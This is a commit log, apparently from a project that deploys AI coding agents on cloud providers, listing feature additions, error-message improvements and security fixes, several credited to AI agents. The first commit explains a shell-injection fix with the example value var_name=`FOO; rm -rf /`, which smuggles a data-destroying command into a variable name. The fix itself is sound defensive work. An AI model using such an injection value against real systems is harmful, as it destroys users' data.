- Example exploit: var_name=`FOO; rm -rf /` would execute the rm command

Affected Files:
- shared/key-request.sh: _try_load_env_var() - var_name from manifest.json
- shared/common.sh: _load_token_from_config(), ensure_api_token_with_provider(), _multi_creds_load_config(), _multi_creds_prompt(), _poll_instance_once() - var_name from function parameters
- test/record.sh: _load_multi_config_from_file(), _try_load_cloud_config(), _prompt_cloud_creds_interactive() - var_name from test fixtures

Fix Applied:
- Added regex validation before all export statements: `^[A-Z_][A-Z0-9_]*$`
- This allowlist enforces standard POSIX environment variable naming (uppercase letters, digits, underscores only, must start with letter or underscore)
- Returns error if validation fails, preventing injection

Impact:
- While current usage passes hardcoded env var names (e.g., "HCLOUD_TOKEN"), the vulnerability existed in the implementation
- manifest.json is currently trusted, but defense-in-depth prevents supply chain attacks or accidental malformed entries
- Test infrastructure was also vulnerable to malicious fixture data

Agent: security-auditor

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 04:01:25 -05:00
A
ecdfc5fa9b
feat: Add Codex CLI on HOSTKEY (#1071)
* feat: Add Codex CLI on HOSTKEY

Agent: gap-filler
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>

* fix: Address security review feedback

- Use >/dev/null 2>&1 instead of &> for macOS bash 3.2 compatibility
- Rename matrix key from hostkey/codex-cli to hostkey/codex

---------

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
2026-02-14 03:47:42 -05:00
A
c947328fdd
ux: Improve error messages and timeout feedback (#1084)
Enhanced user-facing error messages across critical failure points:

1. SSH timeout errors:
   - Added contextual progress messages (normal/slow/unusually slow)
   - Expanded troubleshooting steps with specific commands
   - Added support for SPAWN_DASHBOARD_URL and SPAWN_RETRY_CMD env vars
   - Changed from log_warn to log_error for consistency

2. OAuth timeout errors:
   - Clearer explanation of what failed
   - More actionable troubleshooting steps
   - Direct link to API key page
   - Changed from log_warn to log_error for consistency

3. Agent installation failures:
   - More specific common causes (network, disk, dependencies)
   - Concrete debugging commands (df -h, free -h)
   - Better explanation of transient failures

4. Instance provisioning timeouts:
   - Clearer explanation of cloud provider delays
   - Support for SPAWN_DASHBOARD_URL in error output
   - More specific next steps

All errors now follow a consistent pattern:
- Clear statement of what failed
- Common causes section
- Actionable troubleshooting steps with specific commands

Agent: ux-engineer

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 03:47:36 -05:00
A
514bc7abc9
feat: add Gcore cloud provider with 3 agent scripts (#1079)
Add Gcore (gcore.com) as a new cloud provider supporting global edge
cloud instances via REST API with hourly billing. Implements full test
infrastructure including mock fixtures, URL stripping, body validation,
and live recording support.

- gcore/lib/common.sh: Cloud library with apikey auth, project auto-detection
- gcore/claude.sh, aider.sh, goose.sh: Agent deployment scripts
- manifest.json: Cloud definition + 15 matrix entries (3 implemented, 12 missing)
- test/mock.sh: URL stripping for Gcore path-parameter API, body validation, synthetic responses
- test/record.sh: Endpoints, auth, API caller, error detection, live cycle
- test/fixtures/gcore/: 8 fixture files for mock testing

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 00:19:25 -08:00
A
9b1361de14
fix: Remove sprite-env checkpoint calls from refactor service (#1082)
The refactor service runs on a generic VM, not Sprite-specific
infrastructure. The sprite-env command was causing failures:
- Line 418: sprite-env: command not found

Also resolved git identity error by configuring service account:
- user.name: Spawn Refactor Service
- user.email: refactor@spawn.service

Changes:
- Removed all 3 sprite-env checkpoint create calls
- Replaced with explanatory comments

This allows the refactor service to complete cycles successfully.

Co-authored-by: Spawn Refactor Service <refactor@spawn.service>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 03:11:04 -05:00
A
4cda0e35f2
feat: add ServerSpace cloud provider with 3 agent scripts (#1080)
Add ServerSpace (serverspace.io) as a new cloud provider with global
locations (EU, US, Asia). Uses REST API with X-API-KEY auth and async
task-based server creation with polling.

- serverspace/lib/common.sh: Full provider library with API wrapper,
  SSH key management, server provisioning with cloud-init, task polling
- serverspace/claude.sh: Claude Code agent deployment
- serverspace/aider.sh: Aider agent deployment
- serverspace/goose.sh: Goose agent deployment
- manifest.json: Cloud definition + 15 matrix entries (3 implemented)
- test/mock.sh: URL stripping, body validation, synthetic responses
- test/record.sh: Endpoints, auth, API calls, error detection
- test/fixtures/serverspace/: Mock fixtures for all API endpoints

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 02:47:07 -05:00
A
ab7754e11b
fix: Handle comma-separated auth vars in key-request.sh (#1081)
The auth parsing in _load_cloud_credentials() only handled '+' separators,
but some clouds (like alibabacloud) use comma-separated env var lists.

Changed `tr '+' '\n'` to `tr '+,' '\n'` to handle both formats.

Fixes error: "ALIYUN_ACCESS_KEY_ID, ALIYUN_ACCESS_KEY_SECRET: invalid variable name"

Co-authored-by: Spawn QA Bot <qa-bot@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 02:46:49 -05:00
A
601842603a
feat: Add Amazon Q CLI on HOSTKEY (#1077)
Agent: gap-filler

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Co-authored-by: Security Reviewer <security-reviewer@spawn.dev>
2026-02-14 02:21:24 -05:00
A
8e4def50a7
feat: Add Open Interpreter on HOSTKEY (#1072)
Agent: gap-filler

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
Co-authored-by: Security Reviewer <security-reviewer@spawn.dev>
2026-02-14 02:20:50 -05:00
A
eb1c7d4fd7
security: fix unsafe variable expansion in discovery.sh prompt heredocs (#1070)
Replace split heredoc + echo pattern in build_team_prompt() with a
single quoted heredoc using MATRIX_SUMMARY_PLACEHOLDER, substituted
safely via python3 (consistent with WORKTREE_BASE_PLACEHOLDER pattern).

Also fixes:
- build_single_prompt(): unquoted <<EOF with ${cloud}/${agent} replaced
  with printf '%s' for safe string insertion
- get_matrix_summary(), count_gaps(), build_single_prompt(): ${MANIFEST}
  expanded inside python3 -c strings replaced with sys.argv parameter
  passing (consistent with PR #842 security pattern)

Fixes #1067

Agent: issue-responder

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 02:20:20 -05:00
A
2394f8af1b
feat: Add Amazon Q on CloudSigma (#1073)
Implements cloudsigma/amazonq.sh - deploys AWS's Amazon Q CLI coding
assistant on CloudSigma cloud infrastructure with OpenRouter integration.

Agent: gap-filler

Co-authored-by: OpenRouter Bot <noreply@openrouter.ai>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>
2026-02-14 02:20:08 -05:00